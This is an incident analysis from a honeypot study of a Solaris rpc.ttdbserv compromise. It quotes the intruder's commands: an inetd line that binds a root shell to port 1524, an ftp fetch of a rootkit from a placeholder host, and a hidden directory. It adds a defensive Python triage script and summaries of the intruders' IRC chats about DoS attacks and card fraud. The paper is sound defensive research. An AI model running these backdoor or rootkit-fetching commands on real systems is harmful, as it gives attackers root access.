The Motives and Psychology of the Black-hat Community
This paper is a continuation of
the Know Your Enemy
series. This series is dedicated to learning the tools and tactics
of the black-hat community. Unlike the previous papers which focused purely on
the "what" and "how" of the black-hat community, specifically the technical tools,
their use and implementation, this paper explores the motivation and psychology
of the black-hat community, in their very own words. Part I starts with the compromise
of a Solaris 2.6 system. Part II provides information
rarely published, a record of conversations and actions which took place over a fourteen-day
period following the compromise of a honeypot system.
Learn how and why black-hats attack systems. Once the Solaris 2.6 system was
compromised, the black-hat put an IRC bot on our system. This bot,
configured and implemented by the black-hat, captured all their conversations
on an IRC channel. We monitored these conversations over a two week
period, all of which are contained here. This paper is not meant
to be a generalization of the black-hat community. Instead, we present
a specific incident involving several individuals. However, this should
give you an idea of how certain members can think and behave. This is a
common threat that we all face in the security community, and we
sincerely hope other security professionals benefit from this work.
This information was obtained through the use of a honeynet. A honeynet is a network of various honeypots, designed to be compromised by the black-hat community. While some honeypots are used to divert the attention of attackers from legitimate systems, the purpose of a honeynet is to learn the tools and tactics of the black-hat community. Most of the information provided in this document has been sanitized. Specifically, user identities and passwords, credit card numbers, and most of the system names involved have all been changed. However, the actual technical tools and the chat sessions themselves have not been sanitized. All this information was forwarded to both CERT and the FBI before being released. Also, over 370 notifications were sent out to administrators of systems we believed were compromised.
Foreword, by Brad Powell
Part I: The Compromise
On June 4, 2000 our Solaris 2.6 honeypot was compromised with the rpc.ttdbserv Solaris exploit, which allows the execution of code via a buffer overflow in the ToolTalk object database server (CVE-1999-0003). Note that this exploit is also listed as #3 in the SANS Top Ten List. This attack was both detected and alerted on by snort, a sniffer-based IDS.
Jun 4 11:37:58 lisa snort: IDS241/rpc.ttdbserv-solaris-kill: 192.168.78.12:877 -> 172.16.1.107:32775
The rpc.ttdbserv exploit is a buffer overflow attack that allows the remote user to execute commands on the system as root. The following command was executed, giving the black-hat a backdoor. The service ingreslock (predefined in /etc/services as port 1524) is added to a file called '/tmp/bob', and then inetd is executed with '/tmp/bob' as the configuration file. /bin/sh is then bound to port 1524 and is running as root, giving the remote user root access.
/bin/ksh -c echo 'ingreslock stream tcp nowait root /bin/sh sh -i' >>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob
Once the black-hat created this backdoor, he connected to port 1524, accessed a shell as root, and executed the following commands. He creates two user accounts, so he can telnet back in. Notice the errors and control characters; the shell on port 1524 does not have a proper environment.
# cp /etc/passwd /etc/.tp;
Our black-hat now has two accounts on our compromised system. He can now telnet in as the user 're', then su to the user 'r', which has UID 0, thus gaining root access. We will now review the actual keystrokes of the black-hat as they do just that, and more.
Our black-hat now has root access. As is common, the next step is to retrieve the rootkit and take control of the system. First, we see the black-hat create a 'hidden' directory to hide the rootkit.
# mkdir /dev/".. "
After creating the directory, the black-hat retrieves the rootkit from another system.
# ftp shell.example.net
Once the rootkit is successfully downloaded, the kit is untarred and installed. Notice how the entire rootkit is installed by executing a single script, setup.sh. This script also calls another script, secure.sh. You can download the entire Solaris rootkit used in this attack here.
# tar -xvf sun2.tar
Here the rootkit installation script first cleans out the log files to delete the information associated with the black-hat's activities.
After cleaning the log files, the next step is to secure our system (how nice of them). They know we are an easy kill and they do not want anyone else to ruin their compromised system.
Next, an IRC proxy is launched. What is bizarre is that later on the script kills this process. I have no idea why.
Irc Proxy v2.6.4 GNU
project (C) 1998-99
More file modifications are done. Not seen from the script output are the copying of Trojan binaries, including /bin/login, /bin/ls, /usr/sbin/netstat, and /bin/ps. I highly recommend you review the source of the setup.sh script and the secure.sh script to see what actually happens. One day you may have to review a system that has been rooted with a similar kit.
# kill -9 11467
Last, our black-hat launches an IRC bot. The purpose of this bot is to ensure they will maintain ops on the IRC channel of their choice. This bot also recorded all their conversations on the IRC channel. It is this bot that they installed on our compromised system that relayed their IRC chats on our network.
# ../me -f bot2
Once the bot was in place, they left the system alone. It is this bot that captured all of their conversations (see Part II below). For more information on IRC and how the black-hat community uses IRC and bots, we highly recommend the paper Tracking Hackers on IRC by David Brumley. Over the course of the following week they returned several times, only to confirm that they still had access. One week later, on 11 June, they connected again and attempted to use the system for Denial of Service attacks. However, the honeynet is designed to block any attempt to use a honeypot as a base of an attack against outside systems. All attempts to use the honeypot for a Denial of Service attack were automatically blocked.
What we have witnessed here are commonly used tools and tactics of the black-hat community. Our black-hat randomly scanned the Internet for a known vulnerability (in this case rpc.ttdbserv). Once identified, they quickly compromised the system and installed a rootkit using commonly scripted tools. Once they had control, they installed a bot, most likely to ensure they would maintain 'ops' on the IRC channels of their choice. What is uncommon are the two weeks of IRC chat sessions that their bot captured for us. In the next part of this paper, we discover the motivations and psychology of the black-hat community, in their own words. If you are concerned that your system(s) may have been compromised by similar means, review this checklist. It covers what to check for and links on how to react to a system compromise.
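The three artefacts of the compromise described in Part I (an extra UID 0 account in the password file, an inetd configuration that binds a root shell to port 1524, and a rootkit hidden under /dev/".. ") can each be checked for mechanically. The following is an added example written for this page; it is not code from the original paper or from the Honeynet Project. It assumes standard /etc/passwd, /etc/services and inetd.conf formats, and the sample input at the bottom is constructed to mirror the incident (the 're' and 'r' account names come from the paper; the UIDs, home directories, shells and the /dev listing are made up). The dots-only directory-name check generalises beyond the ".. " name seen here.

```python
"""Triage checks for the Part I artefacts (added example, not the paper's code).

Checks three indicators: an extra UID 0 account in passwd, an inetd entry
whose server program is a shell (the 'ingreslock ... /bin/sh sh -i' line),
and a 'hidden' directory name such as /dev/".. ".
"""
import os
import re
import sys

SHELLS = {"sh", "ksh", "csh", "bash", "tcsh", "zsh"}
# Names imitating '.'/'..' with trailing whitespace, names made only of dots
# (a generalisation of the ".. " seen in this incident), and names with
# leading/trailing whitespace or control characters.
HIDDEN_NAME = re.compile(r"^\.\.?\s+$|^\.{3,}$|^\s|\s$|[\x00-\x1f]")


def find_extra_root_accounts(passwd_text):
    """Return user names other than 'root' whose UID field is 0."""
    extra = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        # skip blanks, comments and NIS '+' entries that have no numeric UID
        if len(fields) < 3 or not fields[2].isdigit():
            continue
        if int(fields[2]) == 0 and fields[0] != "root":
            extra.append(fields[0])
    return extra


def parse_services(services_text):
    """Map (service_name, proto) -> port from /etc/services-format text."""
    ports = {}
    for line in services_text.splitlines():
        parts = line.split("#", 1)[0].split()
        if len(parts) < 2 or "/" not in parts[1]:
            continue
        port, proto = parts[1].split("/", 1)
        for name in [parts[0]] + parts[2:]:  # aliases follow the port field
            ports[(name, proto)] = int(port)
    return ports


def find_shell_services(inetd_text, services_text):
    """Return (service, port, user, program) for inetd entries that run a shell.

    inetd.conf fields: service socket_type proto wait|nowait user program args...
    """
    ports = parse_services(services_text)
    hits = []
    for line in inetd_text.splitlines():
        parts = line.split("#", 1)[0].split()
        if len(parts) < 6:
            continue
        service, _stype, proto, _wait, user, program = parts[:6]
        if os.path.basename(program) in SHELLS:
            hits.append((service, ports.get((service, proto)), user, program))
    return hits


def find_suspicious_dirnames(names):
    """Return entries from a directory listing that match HIDDEN_NAME."""
    return [n for n in names if HIDDEN_NAME.search(n)]


def triage(passwd_text, inetd_text, services_text, dev_names):
    """Run all three checks and return the findings as a dict."""
    return {
        "extra_root_accounts": find_extra_root_accounts(passwd_text),
        "shell_services": find_shell_services(inetd_text, services_text),
        "hidden_dirs": find_suspicious_dirnames(dev_names),
    }


# Constructed sample input modelled on the incident (UIDs, homes, shells and
# the /dev listing are made up; only the account names follow the paper).
SAMPLE_PASSWD = (
    "root:x:0:1:Super-User:/:/sbin/sh\n"
    "daemon:x:1:1::/:\n"
    "re:x:1001:1::/tmp:/bin/sh\n"
    "r:x:0:1::/tmp:/bin/sh\n"
)
SAMPLE_SERVICES = "ftp\t21/tcp\ntelnet\t23/tcp\ningreslock\t1524/tcp\n"
SAMPLE_INETD = "ingreslock stream tcp nowait root /bin/sh sh -i\n"  # the /tmp/bob line
SAMPLE_DEV_NAMES = ["null", "tty", ".. ", "pts"]


def main(argv):
    """Run against the constructed sample, or against the local host with --live."""
    if argv[1:] == ["--live"]:
        with open("/etc/passwd") as f:
            passwd = f.read()
        with open("/etc/services") as f:
            services = f.read()
        inetd = ""
        if os.path.exists("/etc/inetd.conf"):
            with open("/etc/inetd.conf") as f:
                inetd = f.read()
        dev = os.listdir("/dev")
    else:
        passwd, services, inetd, dev = SAMPLE_PASSWD, SAMPLE_SERVICES, SAMPLE_INETD, SAMPLE_DEV_NAMES
    for key, value in triage(passwd, inetd, services, dev).items():
        print(f"{key}: {value}")


if __name__ == "__main__":
    main(sys.argv)
```

Two caveats follow directly from the incident. The rootkit replaced /bin/ls, /bin/ps and /usr/sbin/netstat, so on the compromised host itself the directory listing and process table cannot be trusted; run these checks from a trusted boot medium or feed the functions file contents taken from a mounted image of the disk. Second, the rogue inetd was started with "-s /tmp/bob", so /etc/inetd.conf stays clean; pass find_shell_services the configuration file named on the command line of every inetd process you find, not only the system default.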
Part II: The IRC
Our chat sessions begin with the discussion of building an exploit archive and the sharing of exploits to be used against potential targets.
Today D1ck and J4n3 share exploits and Denial of Service attacks. Notice how they brag about how many blists (broadcast amplifier networks) they have for the attacks. Looks like one of them is gunning for Linux boxes in .edu land. They also discussed using new rootkits for Linux and sparc.
D1ck and J4n3 brag about the systems they have launched Denial of Service attacks against. Later on D1ck teaches J4n3 how to mount a drive. Then they discuss sniffit (how to use it) and last, D1ck desperately looks for an Irix exploit and rootkit.
D1ck and J4n3 decided they want to take out India with Denial of Service attacks and bind exploits. Later on, they DoS other IRC members who irritate them.
D1ck asks J4n3 to take out three systems for him. D1ck and his elite buddy Sp07 try to figure out how a sniffer works "umm doesnt it have to be the same network?".
Our wonder team has been busy; it looks like D1ck rooted over 40 systems. If they scan enough systems, they can and will gain root.
Not an exciting day. D1ck teaches a new k1dd13 how to use the sadmind exploit. We are not sure if D1ck even knows how to use it himself.
D1ck and J4n3 discuss systems they own and people they want to DoS. D1ck discovers Ping of Death and thinks he is very k3wl.
Looks like D1ck strikes it big: he finds an ISP and gains access to their billing and over 5,000 user accounts. Now they have to figure out how to crack them.
Sp07 joins the gang today. Not the friendliest individual for the Internet community. Seems to have taken a wee bit of a dislike to India also.
They start cracking user passwords and access personal accounts.
D1ck and J4n3 try to find credit card numbers on a Credit Card channel so they can buy some domain names.
D1ck and J4n3 cover how to gain accounts on a Linux box, talk more about Credit Cards and continue building a website.
We have just reviewed 14 days in the life of the black-hat community. This is not meant to imply that all black-hats think and act like this. In fact, we have focused only on a few specific individuals. However, we hope this information gives you an idea of what many in the community are capable of. They may not be technically competent, or even understand the tools they are using. However, by focusing on a large number of systems, they can achieve dramatic results. This is not a threat to take lightly. They are not concerned about what harm they may cause. They focus only on achieving their goals.
We would like to thank Alan Paller of SANS. Though not a member of the Honeynet Project, he has helped make this research a reality.